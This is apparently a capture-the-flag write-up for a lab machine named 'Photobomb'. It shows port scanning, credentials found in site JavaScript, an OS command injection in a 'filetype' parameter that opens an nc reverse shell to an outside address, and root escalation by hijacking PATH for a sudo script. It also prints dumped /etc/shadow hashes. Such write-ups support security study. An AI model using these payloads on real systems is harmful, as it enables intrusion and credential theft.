--------------------------------------------------OverView--------------------------------------------------
* User-Flag: feature abuse to RCE (paramter: filetype)
* Root-Flag: sudo enviroment variable change ()

--------------------------------------------------Tools--------------------------------------------------
* User-Flag:
Burp
* Root-Flag:
None

--------------------------------------------------Exploit--------------------------------------------------
* User-Flag:
	- Scan with naabu and nmap:
		naabu -host 10.10.11.182 -nmap-cli "nmap -sCV -Pn"
		
		  ___  ___  ___ _/ /  __ __
		 / _ \/ _ \/ _ \/ _ \/ // /
		/_//_/\_,_/\_,_/_.__/\_,_/ v2.0.6

						projectdiscovery.io

		Use with caution. You are responsible for your actions
		Developers assume no liability and are not responsible for any misuse or damage.
		[INF] Running CONNECT scan with non root privileges
		[INF] Found 2 ports on host 10.10.11.182 (10.10.11.182)
		10.10.11.182:22
		10.10.11.182:80
		[INF] Running nmap command: nmap -sCV -Pn -p 22,80 10.10.11.182
		Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-29 14:58 +07
		Nmap scan report for 10.10.11.182
		Host is up (0.065s latency).

		PORT   STATE SERVICE VERSION
		22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
		| ssh-hostkey:
		|   3072 e2:24:73:bb:fb:df:5c:b5:20:b6:68:76:74:8a:b5:8d (RSA)
		|   256 04:e3:ac:6e:18:4e:1b:7e:ff:ac:4f:e3:9d:d2:1b:ae (ECDSA)
		|_  256 20:e0:5d:8c:ba:71:f0:8c:3a:18:19:f2:40:11:d2:9e (ED25519)
		80/tcp open  http    nginx 1.18.0 (Ubuntu)
		|_http-server-header: nginx/1.18.0 (Ubuntu)
		|_http-title: Did not follow redirect to http://photobomb.htb/
		Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

		Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
		Nmap done: 1 IP address (1 host up) scanned in 14.71 seconds

	- Cheking web service: 
		photobomb.htb:80/robots.txt => sinatra framewok => ruby language
		photobomb.htb:80/photobomb.js => basic authen : pH0t0:b0Mb!@
		photobomb.htb:80/printer => using credential: pH0t0:b0Mb!@
	
	- Investigate download feature => filetype is potential vulnarable coz it append to the end of file name => OS command injection
	
	- Creating playload to RCE:
		photo=masaaki-komori-NYFaNoiPf7A-unsplash.jpg&filetype=png;rm%20/tmp/f;mkfifo%20/tmp/f;cat%20/tmp/f|sh%20-i%202>%261|nc%2010.10.16.17%207050%20>/tmp/f&dimensions=1000x1500
		
		kali@kali:~$ nc -lnvp 7050
		Ncat: Version 7.93 ( https://nmap.org/ncat )
		Ncat: Listening on :::7050
		Ncat: Listening on 0.0.0.0:7050
		Ncat: Connection from 10.10.11.182.
		Ncat: Connection from 10.10.11.182:33116
	
	- Spawn stable tty and get user flag:
		python3 -c 'import pty; pty.spawn("/bin/bash")'

* Root-Flag:
	- Check what wizard user can do using root permission:
		wizard@photobomb:~/photobomb$ sudo -l
		Matching Defaults entries for wizard on photobomb:
			env_reset, mail_badpass,
			secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

		User wizard may run the following commands on photobomb:
			(root) SETENV: NOPASSWD: /opt/cleanup.sh
	
	- Check cleanup.sh content:
		wizard@photobomb:~/test$ cat /opt/cleanup.sh
		#!/bin/bash
		. /opt/.bashrc
		cd /home/wizard/photobomb

		# clean up log files
		if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
		then
		  /bin/cat log/photobomb.log > log/photobomb.log.old
		  /usr/bin/truncate -s0 log/photobomb.log
		fi

		# protect the priceless originals
		find source_images -type f -name '*.jpg' -exec chown root:root {} \;
		
	- "(root) SETENV: NOPASSWD: /opt/cleanup.sh" mean we can run /opt/cleanup.sh with sudo permission and set enviroment for it before running => "find" will be vulnarable
	
	- Creating new find and set test payload:
		touch find
		echo 'chmod 777 /etc/shadow' > find
	
	- Run payload and set enviroment at the same time:
		sudo PATH=/home/wizard/test/:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games /opt/cleanup.sh
		
		(** "/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games" is original PATH to run other command if we not include it error will appear)
		/opt/.bashrc: line 13: [: command not found
		/opt/.bashrc: line 20: [: command not found
		/opt/.bashrc: line 26: [: command not found
		/opt/.bashrc: line 50: [: command not found
		/opt/.bashrc: line 63: [: command not found
		/opt/cleanup.sh: line 6: [: command not found
		/home/wizard/test/find: line 1: chmod: command not found	

	- Check payload result: 
		cat /etc/shadow
		root:$6$7MU2U.CeiY0WX91P$TUNn8zNu/XUPSgURRJbzYvnnawpZdGhsWiLSpVrm1cIx9Rev7V/yQ5x58gTy98zcXrv6RqlWRtXcbhEhTl3240:19251:0:99999:7:::
		daemon:*:19046:0:99999:7:::
		bin:*:19046:0:99999:7:::
		sys:*:19046:0:99999:7:::
		sync:*:19046:0:99999:7:::
		games:*:19046:0:99999:7:::
		man:*:19046:0:99999:7:::
		lp:*:19046:0:99999:7:::
		mail:*:19046:0:99999:7:::
		news:*:19046:0:99999:7:::
		uucp:*:19046:0:99999:7:::
		proxy:*:19046:0:99999:7:::
		www-data:*:19046:0:99999:7:::
		backup:*:19046:0:99999:7:::
		list:*:19046:0:99999:7:::
		irc:*:19046:0:99999:7:::
		gnats:*:19046:0:99999:7:::
		nobody:*:19046:0:99999:7:::
		systemd-network:*:19046:0:99999:7:::
		systemd-resolve:*:19046:0:99999:7:::
		systemd-timesync:*:19046:0:99999:7:::
		messagebus:*:19046:0:99999:7:::
		syslog:*:19046:0:99999:7:::
		_apt:*:19046:0:99999:7:::
		tss:*:19046:0:99999:7:::
		uuidd:*:19046:0:99999:7:::
		tcpdump:*:19046:0:99999:7:::
		landscape:*:19046:0:99999:7:::
		pollinate:*:19046:0:99999:7:::
		usbmux:*:19067:0:99999:7:::
		sshd:*:19067:0:99999:7:::
		systemd-coredump:!!:19067::::::
		wizard:$6$qmjmqNE6eDSugXXx$KSXyEnRqlVcnAOT9iqxGRsrwnakYHAlF8mNMpEE75i3ZHA0T23OVnedmK3rbaw2gMFbLekluAtgByD/mySzsy1:19077:0:99999:7:::
		lxd:!:19067::::::

	- Add nc back connect and get Root-Flag => done
